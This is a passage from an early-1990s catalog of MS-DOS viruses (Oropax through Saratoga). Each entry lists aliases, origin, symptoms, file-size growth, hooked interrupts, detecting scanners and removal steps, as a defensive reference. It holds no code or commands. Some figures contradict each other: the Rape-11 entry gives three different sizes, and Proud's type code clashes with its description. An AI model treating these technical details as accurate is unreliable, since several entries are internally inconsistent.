       will be decreased by 2,048 bytes.  At this time, the virus will
       infect COMMAND.COM on the C: drive, increasing its length by 512 bytes.

       Each time an uninfected program is executed on the system with the
       virus memory resident, the program will become infected with the viral
       code located at the end of the file.  For .COM files, they will
       increase by 512 bytes in all cases.  For .EXE and overlay files, the
       file length increase will be 512 - 1023 bytes.  The difference in
       length for .EXE and overlay files is because the virus will fill out
       the unused space at the end of the last sector of the uninfected file
       with random data (usually a portion of the directory) and then append
       itself to the end of the file at the next sector.  Systems using
       a sector size of more than 512 bytes may notice larger file increases
       for infected files.  Infected files will always have a file length
       that is a multiple of the sector size on the disk.

       In the case of extreme infections of the Ontario Virus, hard disk
       errors may be noticed.

       Ontario uses a complex encryption routine, and a simple identification
       string will not identify this virus.


 Virus Name:  Oropax
 Aliases:     Music Virus, Musician
 V Status:    Rare
 Discovered:  December, 1989
 Symptoms:    .COM growth, tunes
 Origin:      
 Eff Length:  2,756 - 2,806 bytes, but usually 2,773 bytes
 Type Code:   PRC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V53+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  SCAN /D, F-Prot, VirexPC, Pro-Scan 1.4+, VirHunt 2.0+
              or delete infected files
 General Comments:
       The Oropax virus has had several reports, but wasn't first isolated
       until December 1989.  It infects .COM files, increasing their length
       by between 2,756 bytes and 2,806 bytes.  Infected files will always
       have a length divisible by 51.  The virus may become active (on a
       random basis) five minutes after infection of a file, playing three
       different tunes with a seven minute interval in between.

       One variant recently reported in Europe plays six different
       tunes at seven minute intervals.


 Virus Name:  Paris
 Aliases:
 V Status:    Rare
 Discovery:   August, 1990
 Symptoms:    .COM & .EXE file growth; slow program loads upon execution;
              Diskette corruption after diskette boot
 Origin:      Paris, France
 Eff Length:  4,909 Bytes
 Type Code:   PNAK - Parasitic Non-Resident .COM & .EXE Infector
 Detection Method: ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Paris Virus was isolated in Paris, France, in early August, 1990.
       This virus is a generic infector of .COM, .EXE and overlay files,
       and will infect COMMAND.COM.  It is not memory resident.

       When a program infected with the Paris Virus is executed, the virus
       will infect all .COM, .EXE and overlay files on the current drive
       and directory, with the exception of very small .COM files.  It will
       also check to see if COMMAND.COM on the C: drive is uninfected, if it
       has not previously been infected it will become infected.  Infected
       files will increase in length by between 4,909 - 4, 25 bytes, with the
       virus located at the end of the infected file.

       The Paris Virus can be destructive in some instances, resulting in
       diskettes becoming corrupted if the system is booted from a diskette
       with a Paris infected COMMAND.COM program.


 Virus Name:  Parity
 Aliases:
 V Status:    New
 Discovered:  December, 1990
 Symptoms:    .COM file growth; long .COM program loads;
              possibly intermittent parity errors
 Origin:      Bulgaria
 Eff Length:  441 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM  Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Parity Virus was received in December, 1990, and originated in
       Bulgaria.  This virus is a non-memory resident infector of .COM files,
       and will infect COMMAND.COM.

       When a program infected with the Parity Virus is executed, the virus
       will infect all .COM files in the current directory.  If COMMAND.COM
       is in the current directory, it will become infected.

       Infected .COM programs will increase in length by 441 bytes, the virus
       being located at the end of the infected program.  The program's date
       and time in the disk directory will not be altered by the virus.

       The major symptom of a Parity Virus infection is that it will take
       significantly longer to load and execute infected .COM files.  The
       increase in time is due to the virus searching the current drive for
       .COM files to infect.

       This virus may also display a message "PARITY CHECK 2" at times, and
       halt the system.


 Virus Name:  Payday
 Aliases:
 V Status:    Rare
 Discovered:  November, 1989
 Symptoms:    TSR, .EXE & .COM growth, system slowdown, deleted files
              on Friday EXCEPT 13th, "Black WIndow"
 Origin:      Netherlands
 Eff Length:  1,808 Bytes (.EXE) & 1,813 Bytes (.COM)
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V51+, F-Prot, Pro-Scan 1.4+, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  UnVirus, Saturday, CleanUp, F-Prot, Pro-Scan 1.4+
 General Comments:
       The Payday virus was isolated by Jan Terpstra of the Netherlands
       in November, 1989.  It is a variant of the Jerusalem B virus,
       the major difference being that the activation criteria to
       delete files has been changed from every Friday The 13th to
       any Friday but Friday The 13ths.

       Also see: Jerusalem, Jerusalem B, New Jerusalem, Suriv 3.00


 Virus Name:  Pentagon
 Aliases:
 V Status:    Extinct
 Discovered:  January, 1988
 Symptoms:    TSR, BSC 360k floppies, file (see text)
 Origin:      USA      
 Eff Length:  N/A
 Type Code:   RF - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, VirexPC
 Removal Instructions: MDisk, CleanUp, or DOS SYS Command
 General Comments:
       The Pentagon virus consists of a normal MS-DOS 3.20 boot
       sector where the name 'IBM' has been replaced by 'HAL', along
       with two files.  The first file has a name of the hex
       character 0F9H, and contains the portion of the virus code
       which would not fit into the boot sector, as well as the
       original boot sector of the infected disk.  The second file
       is named PENTAGON.TXT and does not appear to be used or contain
       any data.  The 0F9H file is accessed by its absolute storage
       address.  Portions of this virus are encrypted.

       The Pentagon virus only infects 360K floppies, and will look
       for and remove the Brain virus from any disk that it infects.
       It is memory resident, occupying 5K of RAM, and can survive
       a warm reboot or CTL-ALT-DEL.


 Virus Name:  Perfume
 Aliases:     765, 4711
 V Status:    Endangered
 Discovered:  December, 1989
 Symptoms:    .COM growth, messages
 Origin:      Germany
 Eff Length:  765 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method: ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D/X, F-Prot, Pro-Scan 1.4+, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The Perfume virus is of German origin, and has also been
       isolated in Poland in December, 1989.  This virus infects
       .COM files, and will look for COMMAND.COM and infect it if
       it isn't already infected.  Infected files always grow in
       length by 765 bytes.

       The virus will sometimes ask the system user a question,
       and then not run the infected program unless the system
       user responds by typing 4711, the name of a German perfume.

       In the most common variant of this virus, however, the
       questions have been overwritten with miscellaneous
       characters.

       Also see: Sorry


 Virus Name:  Phoenix
 Aliases:     P1
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    .COM growth, system reboots, CHKDSK program failure,
              COMMAND.COM header change
 Origin:      Bulgaria
 Eff Length:  1,704 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM Infector
 Detection Method: ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The Phoenix virus is of Bulgarian origin, and was submitted to
       the author of this document in July, 1990 by Vesselin Bontchev.
       This virus is one of a family of three (3) viruses which may be
       referred to as the P1 or Phoenix Family.  Each of these viruses is
       being documented separately due to their varying characteristics.
       The Phoenix virus is a memory resident, generic infector of .COM
       files, and will infect COMMAND.COM.

       The first time a program infected with the Phoenix virus is executed,
       the virus will install itself memory resident in free high memory,
       reserving 8,192 bytes.  Interrupt 2A will be hooked by the virus.
       System total memory and free memory will decrease by 8,192 bytes.
       If the program was executed from a floppy drive, and COMMAND.COM was
       not present on the diskette, the virus will request that a diskette
       with \COMMAND.COM present be inserted in the drive.  Phoenix will
       immediately infect COMMAND.COM by overwriting part of the binary zero
       portion of the program, and changing the program's header information.
       COMMAND.COM will not change in file length.  The virus will then
       similarly infect COMMAND.COM residing in the C: drive root directory.

       After becoming memory resident, the virus will attempt to infect any
       .COM file executed.  Most of its attempts, however, will not result in
       a file being infected.  Phoenix is a fairly poor replicator.  If the
       virus is successful in infecting the file, it will append its viral
       code to the end of the file, increasing the file's length by 1,704
       bytes.

       Phoenix is not able to recognize when it has previously infected a file,
       so it may reinfect .COM files several times.  Each infection will
       result in another 1,704 bytes of viral code being appended to the
       file.

       Systems infected with the Phoenix virus will experience problems with
       executing CHKDSK.COM.  Attempts to execute this program with Phoenix
       memory resident will result in a warm reboot of the system occurring,
       however the memory resident version of Phoenix will not survive the
       reboot.  If an autoexec.bat file is not present on the drive being
       booted from, the system will prompt for the user to enter Date and
       Time.

       The Phoenix Virus employs a complex encryption mechanism, and virus
       scanners which are only able to look for simple hex strings will not
       be able to detect it.  There is no simple hex string in this virus
       that is common to all infected samples.

       This virus is not related to the Cascade (1701/1704) Virus.

       Also see: Evil, PhoenixD


 Virus Name:  PhoenixD
 Aliases:     P1
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    .COM growth, system reboots, CHKDSK program failure,
              COMMAND.COM header change
 Origin:      Bulgaria
 Eff Length:  1,704 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM Infector
 Detection Method: ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The PhoenixD virus is of Bulgarian origin, and was submitted to
       the author of this document in July, 1990 by Vesselin Bontchev.
       This virus is one of a family of three (3) viruses which may be
       referred to as the P1 or Phoenix Family.  Each of these viruses is
       being documented separately due to their varying characteristics.
       The PhoenixD virus is a memory resident, generic infector of .COM
       files, and will infect COMMAND.COM.

       The PhoenixD Virus is a "bug fixed" version of the Phoenix virus.

       The first time a program infected with the PhoenixD virus is executed,
       the virus will install itself memory resident in free high memory,
       reserving 8,192 bytes.  Interrupt 2A will be hooked by the virus.
       System total memory and free memory will decrease by 8,192 bytes.
       PhoenixD will then check to see if the current drive's root directory
       contains a copy of COMMAND.COM.  If a copy of COMMAND.COM is found,
       it will be infected by PhoenixD by overwriting part of the binary zero
       portion of the program, and changing the program's header information.
       COMMAND.COM will not change in file length.  The virus will then
       similarly infect COMMAND.COM residing in the C: drive root directory.

       After becoming memory resident, the virus will attempt to infect any
       .COM file executed.  PhoenixD is a much better replicator than the
       original Phoenix Virus, and is usually able to infect files.  Infected
       files will increase in length by 1,704 bytes.  

       PhoenixD is not able to recognize when it has previously infected a
       file, so it may reinfect .COM files several times.  Each infection will
       result in another 1,704 bytes of viral code being appended to the
       file.

       A characteristic present in the PhoenixD Virus which is not found in
       the original Phoenix Virus is that in addition to it infecting .COM
       files as they are executed, .COM files will be infected when they
       are opened for any reason.  The simple act of copying a .COM file
       with PhoenixD present in memory will result in both the source and
       target files being infected.

       Systems infected with the PhoenixD virus will experience problems with
       executing CHKDSK.COM.  Attempts to execute this program with Phoenix
       memory resident will result in a warm reboot of the system occurring.
       If an autoexec.bat file is not present on the drive being booted from,
       the system will prompt for the user to enter Date and Time.

       The PhoenixD Virus employs a complex encryption mechanism, and virus
       scanners which are only able to look for simple hex strings will not
       be able to detect it.  There is no simple hex string in this virus
       that is common to all infected samples.

       This virus is not related to the Cascade (1701/1704) virus.

       Also see: Evil, Phoenix


 Virus Name:  Ping Pong
 Aliases:     Bouncing Ball, Bouncing Dot, Italian, Vera Cruz
 V Status:    Extinct
 Discovered:  March, 1988
 Symptoms:    Graphic display (see text), TSR, BSC
 Origin:      
 Eff Length:  N/A
 Type Code:   RsF - Resident Floppy Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, VirexPC, Pro-Scan,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions:  MDisk, CleanUp, F-Prot, Pro-Scan 1.4+, VirexPC,
              or DOS SYS command
 General Comments:
       The Ping Pong virus is a boot sector virus which was first
       reported in March 1988.  The original Ping Pong virus only
       infects Floppy Disks.

       When the virus activates, which is on a random basis, a
       bouncing ball or dot appears on the screen.  This display
       can only be stopped thru a system reboot.  No other damage
       is apparently done.

       The Ping Pong Virus is extinct, though the hard disk variant,
       Ping Pong-B listed below, is one of the most common MS-DOS
       viruses.


 Virus Name:  Ping Pong-B
 Aliases:     Bouncing Ball Boot
 V Status:    Common
 Discovered:  May, 1988
 Symptoms:    Graphic display (see text), TSR, BSC
 Origin:      
 Eff Length:  N/A
 Type Code:   BRs - Resident Boot Sector Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: CleanUp, MDisk, Pro-Scan 1.4+, F-Prot, VirexPC
              or DOS SYS Command
 General Comments:
       The Ping Pong-B virus is a variant of the Ping Pong virus.  The
       major difference is that Ping Pong-B can infect hard disks as
       well as floppies.

       Known variants of Ping Pong-B include:
       Ping Pong-C : Similar to Ping Pong-B, though this variant does
            not have the bouncing ball screen effect.
            Origin: Argentina, June 1990.


 Virus Name:  Plastique
 Aliases:     Plastic Bomb, Plastique 3012, Plastique 1
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    TSR; .COM & .EXE growth; possible system slowdown or bomb
              noises after September 20
 Origin:      Taiwan
 Eff Length:  3,012 Bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Clean-Up V72+, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The Plastique, or Plastic Bomb, Virus was submitted in July 1990, it
       comes to us from Taiwan.  Plastique is a memory resident generic
       infector of .COM and .EXE files, though it does not infect
       COMMAND.COM.  Unlike the Plastique-B Virus listed below, this virus
       does not infect floppy disk boot sectors.

       The first time a program infected with Plastique is executed, the
       virus will install itself memory resident as a TSR in low system
       memory.  The TSR is 3,264 bytes in length, and hooks interrupt 21.

       After the virus is memory resident, it will attempt to infect any
       .COM or .EXE file which is executed.  This virus is rather "buggy",
       and it is not always successful in infecting files when they are
       executed.  When it is successful infecting the file, the file's
       length will increase.  For infected .COM files, the length will
       increase by 3,012 bytes.  For infected .EXE files, their length
       will increase between 3,012 and 3,020 bytes.

       Plastique will also attempt to infect files when they are opened for
       any reason, though again, it is not always successful.

       After September 20th of any year, the Plastique Virus activates.  At
       that time, it will do either of two things.  It will either
       progressively slowdown the system, or it will intermittently emit
       "bomb" noises from the system speaker.

       Known variant(s) of Plastique are:
       HM2            : The earliest known version of this virus, it does
                        not replicate.  Executing an infected file results
                        in the system hanging requiring a reboot.
                        Origin: Taiwan, May 1990.
       Plastique 4.51 : A variant of the Plastique virus described above,
                        the only real difference is that the encryption
                        of the virus is slightly different.  Otherwise it
                        behaves exactly the same as Plastique.
                        Origin: Taiwan, July 1990.
       Plastique COBOL: A variant of the Plastique virus described above, this
                        version is 3,004 bytes in length, and its memory
                        resident TSR is 3,248 bytes in length.  The only text
                        character string which can be found in this variant is
                        "COBOL".  This string does not occur in other variants
                        of the Plastique Virus, or related viruses.  Infected
                        .COM programs will increase in size by 3,004 bytes,
                        .EXE files by 3,004 to 3,019 bytes.  COMMAND.COM will
                        not become infected.  Activation of the virus has also
                        been altered.  Between January 1 and September 21, the
                        virus will progressively slowdown the system.  After 20
                        minutes, the system will execute at approximately 50%
                        of its original speed.  After 30 minutes, the virus
                        may lockout the system keyboard, as well as corrupt
                        the system's CMOS configuration.  Between September 22
                        and December 31, the virus does not activate, and no
                        system slowdown or CMOS corruption will occur.

       Also see: Invader, Plastique-B


 Virus Name:  Plastique-B
 Aliases:     Plastic Bomb, Plastique 5.21, Plastique 2
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    TSR, .COM & .EXE file growth; BSC;
 Origin:      Taiwan
 Eff Length:  4,096 Bytes
 Type Code:   PRsAB - Parasitic Resident .COM & .EXE, & Boot Sector Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+
 Removal Instructions: Clean-Up V72+, Pro-Scan 2.01+, or Delete Infected Files
 General Comments:
       The Plastique-B, or Plastique 5.21, virus is a later version of
       the Plastique virus.  Like Plastique, it is a memory resident
       generic infector of .COM and .EXE files.  This version will also
       infect diskette boot sectors.  It does not infect COMMAND.COM.

       If the system date is before September 20th, the first time a program
       infected with Plastique-B is executed, the virus will install itself
       memory resident as a TSR in low system memory.  The TSR is 5,120 bytes
       in length.  Interrupts 08, 09, 13, 21, and ED are hooked by the virus.

       If the system date is after September 20th, the virus will install
       itself memory resident in high system memory but below the 640K DOS
       boundary.  The same interrupts will be hooked by the virus.

       After the virus is memory resident, it will attempt to infect any
       .COM or .EXE file which is executed or opened for any reason.  It
       has had many of the "bugs" fixed that were in Plastique, and is
       usually successful in infecting files.  Infected .COM and .EXE files
       will increase in length by 4,096 bytes.

       Plastique-B will also infect the boot sector of any diskettes accessed
       on an infected system.

       After September 20th, 1990, the Plastique-B virus activates. It
       will either progressively slowdown the system or cause "bomb" noises
       to be emitted periodically from the system speaker.  It may also
       overwrite the contents of all drives after this date, depending on if
       a predetermined limit in the virus has been reached.

       Also see: Plastique, Invader


 Virus Name:  Polimer
 Aliases:     Polimer Tapeworm
 V Status:    Rare
 Discovered:  November, 1990
 Symptoms:    .COM growth; Message
 Origin:      Hungary
 Eff Length:  512 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Polimer Virus was discovered in Hungary in November, 1990.  This
       virus is a non-resident infector of .COM files, including COMMAND.COM.

       When a program infected with the Polimer Virus is executed, the
       following message will be displayed:

               "A le' jobb kazetta a POLIMER kazetta !   Vegye ezt !"

       This message can be found near the beginning of all infected files.

       After the message is displayed, the virus will attempt to infect one
       .COM file on the current drive and directory, and one .COM file on the
       C: drive's current directory.  This virus will only infect .COM files
       which are between 512 and 64,758 bytes in length.  If the .COM file it
       attempts to infect has the Read-Only attribute, it will not be infected,
       and the message $ERROR will be displayed.

       Although this virus is actually 456 bytes in length, infected .COM files
       will increase in size by 512 bytes with the virus's code being located
       at the beginning of the file.

       This virus does not appear to do anything besides replicating.


 Virus Name:  Polish 217
 Aliases:     217, Polish Stupid
 V Status:    Rare
 Discovered:  October, 1990
 Symptoms:    .COM growth; system reboot
 Origin:      Koszalin, Poland
 Eff Length:  217 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V71+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Polish 217, or Polish Stupid, Virus was discovered in Koszalin,
       Poland, in October, 1990.  This virus is a non-resident infector of
       .COM files, including COMMAND.COM.

       When a program infected with the Polish Stupid Virus is executed, the
       virus will infect the first uninfected .COM file found in the current
       directory.  Infected .COM files will increase in length by 217 bytes
       with the virus's code being located at the end of the file.  Infected
       files will also end with the hex string 5757h.  The file's date and
       time in the disk directory is not altered.

       A side note on this virus: when the copy of COMMAND.COM pointed to by
       the COMSPEC environmental variable is infected by the virus, the system
       will experience a warm reboot.

       This virus does nothing besides replicating in its current version.

       Known variant(s) of Polish 217 are:
       Polish 217 B : The Polish 217 B variant's major difference is that
               when COMMAND.COM is infected, a warm reboot does not occur.
               Execution of COMMAND.COM will result in the error message:
               "Specified COMMAND search directory bad".  Execution of
               infected programs may also result in the following message
               being displayed and the program terminated:
                   "????????COM
                    Path not found."
               Programs which can detect Polish 217 may not be able to detect
               Polish 217 B as it has been altered.  Scan V72 and below will
               not detect it.


 Virus Name:  Polish 529
 Aliases:     529
 V Status:    Rare
 Discovered:  September, 1990
 Symptoms:    .COM growth; TSR
 Origin:      Poland
 Eff Length:  529 Bytes
 Type Code:   PRsCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V71+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Polish 529 Virus was isolated in September, 1990 in Poland.  This
       virus is a memory resident infector of .COM files.  It will infect
       COMMAND.COM if it is executed with the virus in memory.

       The first time a program infected with the Polish 529 Virus is executed,
       the virus will install itself memory resident as a low system memory
       TSR of 1,664 bytes.  Interrupt 21 will be hooked by the virus.

       Once the virus is memory resident, any .COM file over approximately
       1600 bytes in length will be infected by the virus.  Infected .COM
       files will show a file length increase of 529 bytes and have the
       virus's code located at the beginning of the file.

       This virus does not appear to do anything but replicate.


 Virus Name:  Polish 583
 Aliases:
 V Status:    Rare
 Discovered:  December, 1990
 Symptoms:    .COM file growth
 Origin:      Poland
 Eff Length:  583 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Polish 583 Virus originated in Poland and was submitted in
       December, 1990.  This virus is a non-resident, direct action infector
       of .COM files, including COMMAND.COM.

       When a program infected with Polish 583 is executed, the virus will
       infect one other .COM file on the current drive and directory.  The
       newly infected program will increase in length by 583 bytes with the
       virus's code being located at the end of the infected program.  The
       program's date and time in the disk directory is not altered.

       This virus does not do anything besides replicate.



 Virus Name:  Print Screen
 Aliases:     EB 21, 8290, PRTSC Virus
 V Status:    Rare
 Discovered:  November, 1989
 Symptoms:    BSC, hard disk access slowdown
 Origin:      Bombay, India
 Eff Length:  N/A
 Type Code:   BR - Resident Boot Sector Infector
 Detection Method:  ViruScan V64+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions: M-Disk, Pro-Scan 1.4+, or DOS SYS Command
 General Comments:
       The Print Screen Virus was isolated in Bombay, India in November, 1989
       by Neville Bulsara.  It is the first virus to have originated in
       India.  There are two versions of Print Screen, the later version
       having had some bugs fixed.

       When a system is booted from a Print Screen infected diskette or
       hard drive, the virus will install itself memory resident in the
       top of memory.  The virus then adjusts the amount of memory DOS
       thinks is installed.  Infected systems will show that total system
       memory is 2K less than is installed.  On floppy disks, the original
       boot sector of the diskette will be copied to sector 11.

       After becoming memory resident, the virus will infect any hard
       disk or floppy diskette which is accessed by the system.

       Infected system users will notice that hard disk accesses done for
       any reason will be much slower than expected.  In some cases,
       listing the root directory will show apparently garbage entries in
       it.  These entries are actually part of the virus's code.

       The first version of the Print Screen virus is buggy, and as such
       it doesn't actually accomplish anything having to do with printing
       screens.

       This virus appears to have been based on the Ping Pong Virus, and
       some anti-viral programs will identify it as such.

       Known variant(s) of Print Screen are:
       Print Screen-2: Print Screen-2 is the later, bug fixed version of
            the Print Screen Virus.  This version will attempt to perform
            a screen print or dump to the system's printer after every
            255 disk I/Os have occurred.


 Virus Name:  Proud
 Aliases:     V1302, P1 Related
 V Status:    Rare
 Discovery:   August, 1990
 Symptoms:    .COM growth; decrease in total system and available memory;
              FAT entry corruption
 Origin:      Bulgaria
 Eff Length:  1,302 Bytes
 Type Code:   PRtCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V71+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Proud, or V1302, Virus was isolated in August of 1990 in Bulgaria
       by Vesselin Bontchev.  Proud is a memory resident infector of .COM
       files, including COMMAND.COM.

       The first time a program infected with Proud is executed, the virus
       checks to determine if interrupt 13 is in use by another program, and
       if it is, the virus will hang the system.  If interrupt 13 is not in
       use by another program, Proud will install itself memory resident at
       the top of system memory, but below the 640K DOS boundary.  Total
       system memory and free available memory will decrease by 8,192 bytes.
       Interrupt 2A will be replaced by the virus.

       Once the virus is memory resident, it will infect .COM files within
       certain candidate length ranges whend they are openned for any reason.
       The candidate file length ranges are:

                2,048 - 14,335 bytes
               16,384 - 30,719 bytes
               32,768 - 47,103 bytes
               49,152 - 63,487 bytes
 
       Proud is an encrypted virus, and is unusual in that it "splits"
       the .COM file being infected into two parts, placing the viral code
       between the two sections.  Proud also is unable to distinguish when
       a file has been previously infected, so .COM files can become infected
       multiple times.  Each infection, with the exception of COMMAND.COM,
       will add 1,302 bytes to the file length.  Infected COMMAND.COM files
       generally don't increase in length on the first infection as the virus
       will overwrite part of the 00h area of COMMAND.COM with the viral code.

       Proud can be a damaging virus, with a probability of 1 out of 256, it
       may swap entries in the file allocation table.


 Virus Name:  Rape-11
 Aliases:     Raper/Disk Raper
 V Status:    New
 Discovery:   October, 1991
 Symptoms:    decrease in system and available memory; file date/time changes;
              decrease in CPU speed.
 Origin:      Unknown
 Eff Length:  830 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM Infector
 Detection Method:  Proscan
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Rape-11 Virus is an 783 byte memory resident infector of
       .COM files, including COMMAND.COM and .EXE files .  It was submitted
       in October, 1991, and it's origin is unknown.

       The first time a program infected with Rape-11 is executed, the
       virus will install itself memory resident at the top of system memory
       but below the 640K DOS boundary.  The interrupt 12 return is not moved.
       The DOS ChkDsk command will indicate that total system memory and
       available free memory have decreased by 750 bytes.  Interrupt 21 will
       be hooked by the virus.

       Once Rape-11 is memory resident, any .COM or .EXE program executed will
       become infected by the virus.  If COMMAND.COM is executed, it will be
       infected.

       Infected .COM and .EXE programs will have their file length increased
       by 783 bytes, and their date and time in the disk directory will have
       been altered to the system date and time when infection occurred.  The
       virus will be located at the end of the infected program.


 Virus Name:  Red Diavolyata
 Aliases:     USSR 830
 V Status:    Rare
 Discovery:   December, 1990
 Symptoms:    .COM growth; decrease in system and available memory;
              file date/time changes
 Origin:      USSR
 Eff Length:  830 Bytes
 Type Code:   PRhCK - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Red Diavolyata Virus is an 830 byte memory resident infector of
       .COM files, including COMMAND.COM.  It was submitted in December, 1990,
       and originated in the USSR.

       The first time a program infected with Red Diavolyata is executed, the
       virus will install itself memory resident at the top of system memory
       but below the 640K DOS boundary.  The interrupt 12 return is not moved.
       The DOS ChkDsk command will indicate that total system memory and
       available free memory have decreased by 960 bytes.  Interrupt 21 will
       be hooked by the virus.

       Once Red Diavolyata is memory resident, any .COM program executed will
       become infected by the virus.  If COMMAND.COM is executed, it will be
       infected.

       Infected .COM programs will have their file length increased by 830
       bytes, and their date and time in the disk directory will have been
       altered to the system date and time when infection occurred.  The virus
       will be located at the end of the infected program.

       The following text strings can be found at the end of infected
       programs:

               "Eddie die somewhere in time"
               "This programm was written in the city of Prostokwashino"
               "(C) 1990 RED DIAVOLYATA"
               "Hello! MLTI!"

       Additionally, the text string "MLTI!COMMAND" can be found within
       infected files.

       It is unknown if Red Diavolyata does anything besides replicate.


 Virus Name:  RPVS
 Aliases:     453
 V Status:    Endangered
 Discovery:   August, 1990
 Symptoms:    .COM growth
 Origin:      West Germany
 Eff Length:  453 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method: Pro-Scan 2.01+
 Removal Instructions: Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The RPVS, or 453, Virus was discovered in West Germany in early
       August, 1990.  This virus is a non-resident infector of .COM files.
       The RPVS is named for an unusual string that appears in a file
       dump of the virus - "TUQ.RPVS" - this in not really a text string,
       but a series of PUSH instructions.

       The RPVS Virus is rather unsophisticated virus.  Whenever a .COM
       program infected with the RPVS or 453 virus is executed, the virus
       will look for an uninfected .COM file in the current directory.  The
       virus determines if the .COM file has been previously infected by
       checking to see if the last two bytes of the file are 9090h.  If the
       last two bytes are not 9090h, the file will be infected, appending
       453 bytes of viral code to the end of the file.  One .COM file is
       infected each time an infected program is executed.  COMMAND.COM
       will not normally be infected.

       This virus does not contain any logic to activate and cause damage
       in its current state.  It does contain many NOP instructions and odd
       jumps which leave plenty of space for later additions.  

       Known variant(s) of RPVS are:
       RPVS-B : The RPVS virus after additional bytes have been added to the
                end of an infected program.  When this occurs, the virus
                will act differently.  It will not be able to determine that
                it has already infected a .COM file, so it will reinfect
                the first .COM file it finds in the current directory over
                and over again.


 Virus Name:  Saddam
 Aliases:
 V Status:    New
 Discovery:   January, 1991
 Symptoms:    .COM growth; Message; Disk boot failures; I/O error message;
              "Insufficient memory" message when attempting to run .BAT files;
              Dir command errors; System hangs
 Origin:      France    (reported September, 1990)
 Isolated:    Israel
 Eff Length:  919 Bytes
 Type Code:   PRsCK - Resident Parasitic .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The Saddam Virus was first reported in France in September, 1990.  In
       January, 1991, the first sample of this virus was actually received, its
       isolation point was Israel.  Saddam is a memory resident infector of
       .COM files, including COMMAND.COM.  It is based on the Do-Nothing virus.

       The first time a program infected with the Saddam Virus is executed,
       the virus will install itself memory resident in low system memory,
       though not as a TSR.  Interrupts 21 and 22 will be hooked by the virus.
       COMMAND.COM will be infected at this time if it has not previously
       been infected.

       Once Saddam is memory resident, it will infect .COM programs as they
       are executed or openned.  Infected .COM files will have a file length
       increase of 919 bytes, the virus will be located at the end of
       infected programs.  Programs infected with this virus will not have
       their file date and time altered upon infection.

       There are several symptoms which may be experienced on systems infected
       with the Saddam Virus.  The most obvious symptom is that the following
       message will occasionally be displayed:

               "HEY SADAM
                LEAVE QUEIT BEFORE I COME"

       This message cannot be seen in infected files, it is encrypted.

       Other symptoms are that attempts to execute .BAT files will result in
       an insufficient memory message.  Attempts to boot from a disk with a
       Saddam infected COMMAND.COM will fail, the system will hang.  Execution
       of some infected programs will result in an I/O error and the program
       aborting execution.  The DOS Directory command may also not function
       properly.  Lastly, infected systems may experience frequent system
       hangs requiring the user to reboot the system.

       Also see: Do-Nothing


 Virus Name:  Saratoga
 Aliases:     642, One In Two
 V Status:    Extinct
 Discovery:   July, 1989
 Symptoms:    .EXE growth, Resident, bad sectors, FAT corruption
 Origin:      California, USA
 Eff Length:  642 Bytes
 Type Code:   PRsE - Resident Parasitic .EXE Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan 1.4+, VirexPC,
              VirHunt 2.0+
 Removal Instructions: Scan/D/X, F-Prot, VirexPC, Pro-Scan 1.4+, VirexPC 1.1B+,
              VirHunt 2.0+, or delete infected files
 General Comments:
       The Saratoga Virus was first isolated in California in July 1989.
       This virus is very similar to the Icelandic and Icelandic-II
       viruses, so only the differences from the Icelandic viruses
       are indicated here.  Please refer back to the description of
       the Icelandic virus for the base information.

       The Saratoga virus's main difference from the Icelandic virus
